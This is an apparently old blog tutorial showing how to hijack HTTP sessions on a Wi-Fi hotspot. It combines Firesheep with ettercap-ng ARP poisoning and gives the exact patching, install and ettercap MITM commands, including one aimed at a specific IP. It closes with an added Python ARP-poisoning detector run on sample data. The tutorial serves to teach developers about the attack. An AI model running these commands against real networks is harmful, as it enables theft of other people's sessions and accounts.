Sidejacking with Firesheep and Ettercap-ng

Ok, you probably read that title and thought, “what the heck is that?” Sidejacking is the name given to stealing HTTP sessions, and recently the guys over at CodeButler released a Firefox plugin, called Firesheep, which does exactly that. On its own, it’s an interesting tool for showing you how easy it is to steal a Facebook session, but combined with ettercap-ng (used to execute an ARP poisoning man-in-the-middle attack) it can steal the sessions of anyone connected to a Wi-Fi hotspot. Every web developer should see this sort of attack in action, so they can learn to defend against it.

You all know my rig by now: a MacBook Pro. So first off I’m going to grab the ettercap-ng port from DarwinPorts.

(Note: most of my commands are prefixed with “sudo” because they require administrator privileges. If you prefer, you could just run sudo tcsh or sudo bash to create a root shell.)

$ sudo port install ettercap-ng

So I wait a few minutes while everything is downloaded and built, and eventually it finishes. Then I type:

$ ettercap

And get this…

FATAL: ARP poisoning needs a non empty hosts list.

Ack! In the build I’m using (currently the latest), there’s a problem with the PCAP_TIMEOUT value passed to pcap_open_live(). I’m not sure why a more generous value, like 1000 ms, wasn’t used, but that’s ok – we can patch this up.

Download the patch files –

Portfile-ettercap_ng.diff (452 bytes)
patch_src_ec_capture.c (336 bytes)

Once downloaded I’m going to patch the Portfile with these changes, and reinstall a freshly patched version of ettercap-ng…

$ cd /opt/local/var/macports/sources/rsync.macports.org/release/ports/net/ettercap-ng
$ cd files
$ sudo cp ~/Downloads/patch_src_ec_capture.c .
$ cd ..
$ sudo patch -p0 < ~/Downloads/Portfile-ettercap_ng.diff
$ sudo port uninstall ettercap-ng
$ sudo port install ettercap-ng

Ok, ettercap-ng should be good to go…

$ sudo ettercap -T -q -i en1 -M ARP // //

or for a specific target…

$ sudo ettercap -T -q -i en1 -M ARP /192.168.0.100/ //

Great, 3 hosts found when scanning en1 (my Airport interface). Installing Firesheep is as simple as downloading the .xpi and dropping it onto Firefox. As for running it, just click Start Capturing! 🙂
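Since the whole point of watching this is learning to defend against it, here is the detection side as an added example (my own illustration, not code from the original post or from the ettercap or Firesheep projects): a small Python monitor that flags the ARP behaviour ettercap’s -M ARP mode produces on the segment, namely one MAC claiming both the gateway’s IP and a client’s IP. The ARP replies, IPs and MACs below are constructed sample data.

```python
from collections import defaultdict

# Constructed sample of ARP replies as seen on a Wi-Fi segment: (sender_ip, sender_mac).
# The first three are normal. The last two show a single MAC (the poisoner's) taking
# over the gateway's IP and then a client's IP, which is what an ARP MITM looks like.
SAMPLE_ARP_REPLIES = [
    ("192.168.0.1",   "00:11:22:33:44:01"),  # gateway, legitimate MAC
    ("192.168.0.100", "00:11:22:33:44:64"),  # client
    ("192.168.0.101", "00:11:22:33:44:65"),  # another client
    ("192.168.0.1",   "DE:AD:BE:EF:00:01"),  # gateway IP rebound to a new MAC
    ("192.168.0.100", "DE:AD:BE:EF:00:01"),  # client IP claimed by that same MAC
]

def detect_arp_poisoning(replies, gateway_ip):
    """Walk ARP replies in order and return a list of alert dicts.

    Two signals are checked:
      - an IP that was bound to one MAC is now announced by a different MAC
        (HIGH when it is the gateway, MEDIUM otherwise), and
      - one MAC that claims more than one IP on the segment (HIGH), which is
        the signature of a MITM sitting between a client and the gateway.
    Caveat: DHCP reassignment or a NIC swap also rebinds an IP, so a known-good
    gateway MAC baseline is what makes the HIGH alerts trustworthy.
    """
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    alerts = []
    for ip, mac in replies:
        mac = mac.lower()
        previous = ip_to_mac.get(ip)
        if previous is not None and previous != mac:
            alerts.append({"severity": "HIGH" if ip == gateway_ip else "MEDIUM",
                           "kind": "rebind", "ip": ip,
                           "old_mac": previous, "new_mac": mac})
        ip_to_mac[ip] = mac
        if ip not in mac_to_ips[mac]:
            mac_to_ips[mac].add(ip)
            if len(mac_to_ips[mac]) > 1:  # fire once per newly claimed IP
                alerts.append({"severity": "HIGH", "kind": "multi-ip", "mac": mac,
                               "ips": sorted(mac_to_ips[mac])})
    return alerts

if __name__ == "__main__":
    for alert in detect_arp_poisoning(SAMPLE_ARP_REPLIES, "192.168.0.1"):
        print(alert)
```

On a real segment you would feed it ARP replies pulled from a capture and pin the gateway MAC from a baseline taken on a trusted network.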

Firesheep in action